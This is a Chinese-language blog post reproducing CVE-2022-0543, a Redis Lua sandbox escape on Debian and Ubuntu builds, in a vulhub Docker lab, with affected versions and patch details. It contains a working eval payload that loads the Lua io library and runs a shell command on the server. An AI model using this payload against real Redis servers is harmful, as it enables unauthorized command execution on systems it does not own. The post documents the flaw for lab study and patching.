CVE-2022-0543:redis沙盒逃逸漏洞复现

admin 2022年5月3日01:02:35评论137 views字数 1181阅读3分56秒阅读模式
CVE-2022-0543:redis沙盒逃逸漏洞复现
漏洞简介

redis 是完全开源的,遵守 BSD 协议,是一个高性能的 key-value 数据库。造成redis沙盒逃逸漏洞的原因主要是由于redis lua,redis嵌入了lua编程语言作为其脚本引擎,可通过eval命令使用lua,lua引擎是沙盒化的,不能在运行redis的服务器上执行任意代码。但在Debian以及ubuntu发行版上,由于打包问题,在lua沙箱中遗留了一个对象package,攻击者可以利用这个对象package逃逸redis lua沙盒,在运行redis的服务器上执行任意命令。

CVE-2022-0543:redis沙盒逃逸漏洞复现
漏洞影响版本
  • 2.2 <= redis < 5.0.13

  • 2.2 <= redis < 6.0.15

  • 2.2 <= redis < 6.2.5

CVE-2022-0543:redis沙盒逃逸漏洞复现
漏洞环境搭建

通过vulhub搭建漏洞环境

第一步:

执行git clone https://github.com/vulhub/vulhub

CVE-2022-0543:redis沙盒逃逸漏洞复现

第二步:

进入vulhub/redis/CVE-2022-0543目录

cd  vulhub/redis/CVE-2022-0543

CVE-2022-0543:redis沙盒逃逸漏洞复现

第三步:

启动docker漏洞环境

docker-compose up -d

CVE-2022-0543:redis沙盒逃逸漏洞复现

第四步:

查看漏洞环境映射端口

执行docker-compose ps,即可查看漏洞环境端口为6379

CVE-2022-0543:redis沙盒逃逸漏洞复现

CVE-2022-0543:redis沙盒逃逸漏洞复现
漏洞复现

第一步:

使用RedisDesktopManage连接目标redis数据库,RedisDesktopManage下载地址为:

https://github.com/uglide/RedisDesktopManager/releases/tag/0.9.3

CVE-2022-0543:redis沙盒逃逸漏洞复现

第二步:

点击Open Console,调出redis cmd

CVE-2022-0543:redis沙盒逃逸漏洞复现

第三步:

在redis cmd执行以下语句,即可在安装redis的服务器上执行whoami命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

CVE-2022-0543:redis沙盒逃逸漏洞复现

CVE-2022-0543:redis沙盒逃逸漏洞复现
漏洞修复

将redis软件包升级更新到以下版本

Debian:

  • Debian Redis(buster):5:5.0.14-1+deb10u2

  • Debian Redis(bullseye):5:6.0.16-1+deb11u2

  • Debian Redis(unstable):5:6.0.16-2

 

Ubuntu:

  • Ubuntu 21.10 Redis:5:6.0.15-1ubuntu0.1

  • Ubuntu 20.04 Redis:5:5.0.7-2ubuntu0.1

修复方法:在 Lua 初始化的末尾添加package=nil

CVE-2022-0543:redis沙盒逃逸漏洞复现


CVE-2022-0543:redis沙盒逃逸漏洞复现

原文始发于微信公众号(第59号):CVE-2022-0543:redis沙盒逃逸漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月3日01:02:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-0543:redis沙盒逃逸漏洞复现https://cn-sec.com/archives/965450.html

发表评论

匿名网友 填写信息